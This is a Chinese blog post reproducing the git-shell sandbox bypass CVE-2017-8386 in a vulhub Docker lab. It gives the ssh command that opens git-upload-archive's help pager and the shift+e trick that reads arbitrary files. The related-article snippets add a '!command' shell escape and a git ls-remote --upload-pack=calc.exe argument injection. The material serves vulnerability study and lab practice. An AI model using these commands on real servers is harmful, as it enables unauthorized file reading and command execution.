git CVE-2017-8386

已于 2022-02-18 08:39:27 修改
阅读量749 收藏
点赞数
分类专栏: vulhub靶场复现 文章标签: git
于 2022-02-18 08:38:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_37639863/article/details/122995624
版权

GIT-SHELL 沙盒绕过(CVE-2017-8386)_黑白的博客-CSDN博客声明好好学习,天天向上漏洞描述GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。影响范围复现过程使用vulhub/app/vulhub-master/git/CVE-2017-8386使用docker启动docker-compose builddocker-compose up -d先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令chhttps://blog.csdn.net/zy15667076526/article/details/111414458

 https://paper.seebug.org/309/icon-default.png?t=M1H3https://paper.seebug.org/309/

 开启环境

 

chmod 0600 id_rsa

正常连接其ssh服务ssh -p 3322 -i id_rsa git@127.0.0.1,会被git-shell给拦截,返回错误fatal: unrecognized command '',并且连接被关闭。

使用--help技巧,连接目标并进入帮助页面:

ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'"

按shift+e,读取任意文件:

测了一下,本机是kali 系统,不能直接读取shadow文件。欢迎给位测试其他的系统

B6胶囊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Vulnhub复现漏洞 - GIT-SHELL 沙盒绕过(CVE-2017-8386
JiangBuLiu的博客
07-08 975
GIT-SHELL 沙盒绕过(CVE-2017-8386)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现原理基于ssh协议的git拉取流程如何禁止git用户执行系统shellgit-shell 沙盒绕过漏洞(CVE-2017-8386)通过ssh进行利用一些限制 Vulnhub官方复现教程 https://vulhub.org/#/environments/git/CVE-2017-8...
HyperV:CVE-2017-0075的PoC
04-26
CVE-2017-0075是一个针对Hyper-V的重大安全漏洞,它属于权限提升类型的漏洞。该漏洞源于Hyper-V的内核模式驱动程序处理来宾操作系统请求时的不当验证。攻击者可以利用这个漏洞,当他们在受影响的Hyper-V主机上的来宾...
CVE-2017-8386 git沙盒绕过
m0_46580995的博客
10-17 485
vulhub的cve-2017-8386 sudo ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'" shift+e !+命令
Git严重漏洞,远程执行代码,Mac和Windows通杀!
IT界那些事儿
05-27 8168
不得了了,家人们!就在这几天,Git爆出了一个严重漏洞,编号,一个可以远程执行代码的RCE漏洞!攻击者精心准备一个Git项目,只要你尝试去Clone它,你的电脑就能执行攻击代码沦陷。比如下面这个GitHub上面的项目:你可以执行一下下面的命令:不出意外的话,你的电脑将会弹出计算器程序:能让你弹计算器,就能执行其他更危险的操作,比如给你种木马等等。Git是我们程序员基本离不开的工具,这波漏洞操作,属实是对程序员定向打击了。接下来我们来理一理这个漏洞的工作原理是怎么样的。
GIT-SHELL 沙盒绕过(CVE-2017-8386
EC_Carrot的博客
06-06 280
漏洞背景 Git是美国软件开发者林纳斯-托瓦兹(Linus Torvalds)所研发的一套免费、开源的分布式版本控制系统。git-shell是一个命令行工具。 Git中的git-shell存在安全漏洞。远程攻击者可借助以破折号字符开头的储存库名称利用该漏洞获取权限。 影响版本 2.4.12之前的版本 2.5.6之前的2.5.x版本 2.6.7之前的2.6.x版本 2.7.5之前的2.7.x版本 2.8.5之前的2.8.x版本 2.9.4之前的2.9.x版本 2.10.3之前的2.10.x版本 2.11.2
CVE-2017-8386_ GIT-SHELL 漏洞复现(vulhub)
MDSEC的博客
08-23 271
GIT (分布式版本控制系统),是一个开源的分布式版本控制系统,可以有效、高速地处理从很小到非常大的项目版本管理。也是Linus Torvalds为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件。GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。按住shife+e 输入你想要查看的文件 ,就可以查看文件。然后查看CVE-2017-8386下的文件。老样子,首先拉去镜像环境。执行chmod,修改属性。这样漏洞就复现完成了。
GitHack-master.rar
01-06
5. **Git漏洞利用与防护**:可能包含了关于已知Git漏洞的信息,例如CVE-2021-21300,这是一个允许攻击者通过恶意的Git钩子脚本执行任意代码的漏洞。了解这些漏洞可以帮助我们增强仓库的安全性。 6. **Git forensics...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
在2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
CVE-2020-9484
04-13
CVE-2020-9484(Tomcat) 仅用于...跑步$ git clone https://github.com/masahiro331/CVE-2020-9484.git$ cd CVE-2020-9484$ docker build -t tomcat:groovy .$ docker run -d -p 8080:8080 tomcat:groovy开发$ curl '...
CVE-2014-7911poc
07-04
标题"CVE-2014-7911 poc"指的是一个漏洞利用代码,用于证明CVE-2014-7911安全漏洞的存在。CVE(Common Vulnerabilities and Exposures)是一种全球性的标准,用于唯一标识网络安全漏洞。这个特定的CVE编号,即CVE-...
【vulhub】GIT-SHELL 沙盒绕过(CVE-2017-8386)漏洞复现
qq_45300786的博客
04-16 447
通过此命令达到文艺文件读取 ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'" 输入上图的ssh命令后,在这个界面同时按shift键和e键 然后输入想查看的文件 /etc/passwd 详细文章请参考 https://blog.csdn.net/m0_46580995/article/details/109136159 https://vulhub.org/#/environments/git/CVE-2017
Git安全漏洞检查CVE-2021-21300
GitCode
03-16 2243
CVE-2021-21300 安全漏洞检查 本项目模拟一个利用CVE-2021-21300漏洞执行仓库内恶意脚本的行为,如果您的git客户端有 CVE-2021-21300 的安全漏洞,执行 git clone 本仓库时会输出以下内容 CVE-2021-21300 detected !!! Please update your git to fix the vulnerability CVE-2021-21300 影响分析 由于对 symbolic links 处理的问题,导致在不区分大小写的文件系统例
【漏洞通告】Git凭证泄露漏洞(CVE-2020-5260)通告
爱国小白帽
04-16 1127
【漏洞通告】Git凭证泄露漏洞(CVE-2020-5260)通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 通告编号:NS-2020-0028 2020-04-16 TA****G: Git、凭证泄露、CVE-2020-5260 漏****洞危害: 攻击者利用此漏洞,可****获取Git用户凭据。 版本: 1.0 1 漏洞概述...
CVE-2022-1162 Gitlab 硬编码漏洞分析
m0_60732362的博客
04-18 2266
漏洞描述 GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,可通过 Web 界面访问公开或私人项目。 在GitLab CE/EE版本14.7(14.7.7之前)、14.8(14.8.5之前)和14.9(14.9.2之前)中使用OmniAuth提供商(如OAuth、LDAP、SAML)注册的帐户设置了硬编码密码,允许攻击者潜在地控制帐户。 漏洞版本 Gitlab CE/EE >=14.7,<14.7.7 Git...
各位用到git的,请注意CVE-2024-32002安全漏洞
最新发布
云散的博客
05-30 1138
利用 CVE-2024-32002 漏洞:通过git clone进行RCE的操作新版本(2.45.1) 应该是被修复了新版2.45.1。
Git漏洞允许任意代码执行(CVE-2018-17456)复现
weixin_30405421的博客
10-23 455
Git漏洞允许任意代码执行(CVE-2018-17456) 国外安全研究员 joernchen 在 9 月 23 日向 git 官方报告了漏洞的相关细节。10月5日,Git项目披露了一个漏洞,编号为CVE-2018-17456。当用户克隆恶意存储库时,该漏洞可能会导致执行任意代码。 漏洞描述 这个漏洞已被分配 CVE-2018-17456 这个唯一 ID,与之前的 CVE-2017-10001...
git参数注入
公众号shadow sock7
09-30 800
向前一段时间出的Jenkins的git client插件的RCE(CVE-2019-10392)就是git ls-remote命令拼接导致的命令执行。 然后找了一些git的命令注入的例子: git-ls-remote git ls-remote -h --upload-pack=calc.exe HEAD 这个也是git-ls-remote命令的参数注入漏洞: https://snyk.io/...
Jenkins Git client插件CVE-2019-10392:命令执行漏洞分析
Jenkins Git client插件命令执行漏洞(CVE-2019-10392) Jenkins Git client插件是一个广泛使用的工具,它允许Jenkins与Git版本控制系统进行交互,以便在持续集成和持续部署流程中自动获取代码仓库的更新。然而,在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值